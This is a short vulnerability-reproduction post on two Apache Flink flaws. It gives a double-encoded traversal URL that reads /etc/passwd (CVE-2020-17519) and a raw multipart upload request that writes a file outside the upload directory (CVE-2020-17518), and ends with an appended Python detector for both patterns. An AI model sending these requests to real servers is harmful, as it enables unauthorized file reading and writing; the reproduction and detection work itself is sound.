Apache Flink CVE-2020-17519/CVE-2020-17518 Vulnerability Reproduction

Author: print("") Category: Uncategorized, Vulnerability Reproduction Published: 2021-01-06 11:13

CVE-2020-17519 Arbitrary File Read

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519

Access port 8081:

http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

CVE-2020-17518 

POST /jars/upload HTTP/1.1
Host: 192.168.1.79:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=--------721072898
Content-Length: 150

----------721072898
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../../tmp/11.txt"

success
----------721072898--

Check whether the upload succeeded:

http://192.168.1.79:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252f11.txt
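
Detection side of the two requests above, as an added example that is not part of the original post: it decodes request paths repeatedly (so the double-encoded %252f is seen as /) and flags log reads and jar uploads whose file name leaves its directory. The sample requests and the names flink-jobmanager.log and WordCount.jar are constructed; treating any separator in the log name as suspicious is an assumption.

```python
import re
from urllib.parse import unquote

LOG_PREFIX = "/jobmanager/logs/"
FILENAME_RE = re.compile(r'filename="([^"]*)"', re.IGNORECASE)

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable, so %252f -> %2f -> / is seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_directory(name):
    """True if a decoded name contains a separator or is a '..' segment."""
    name = fully_decode(name).replace("\\", "/")
    return "/" in name or name == ".."

def flag_log_read(request_path):
    """CVE-2020-17519 pattern: traversal in the /jobmanager/logs/<name> part."""
    path = fully_decode(request_path.split("?", 1)[0])
    return path.startswith(LOG_PREFIX) and escapes_directory(path[len(LOG_PREFIX):])

def flag_jar_upload(method, request_path, body):
    """CVE-2020-17518 pattern: multipart filename pointing outside the upload dir."""
    if method.upper() != "POST" or request_path.split("?", 1)[0] != "/jars/upload":
        return False
    return any(escapes_directory(f) for f in FILENAME_RE.findall(body))

# Constructed sample requests (method, path, body), modelled on the ones in this post.
SAMPLES = [
    ("GET", "/jobmanager/logs/..%252f..%252f..%252fetc%252fpasswd", ""),
    ("GET", "/jobmanager/logs/flink-jobmanager.log", ""),
    ("POST", "/jars/upload",
     'Content-Disposition: form-data; name="jarfile"; filename="../../../tmp/11.txt"'),
    ("POST", "/jars/upload",
     'Content-Disposition: form-data; name="jarfile"; filename="WordCount.jar"'),
]

def scan(samples):
    """Return (method, path) for every sample that matches either pattern."""
    return [(m, p) for m, p, b in samples
            if flag_log_read(p) or flag_jar_upload(m, p, b)]

if __name__ == "__main__":
    for method, path in scan(SAMPLES):
        print("ALERT", method, path)
```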
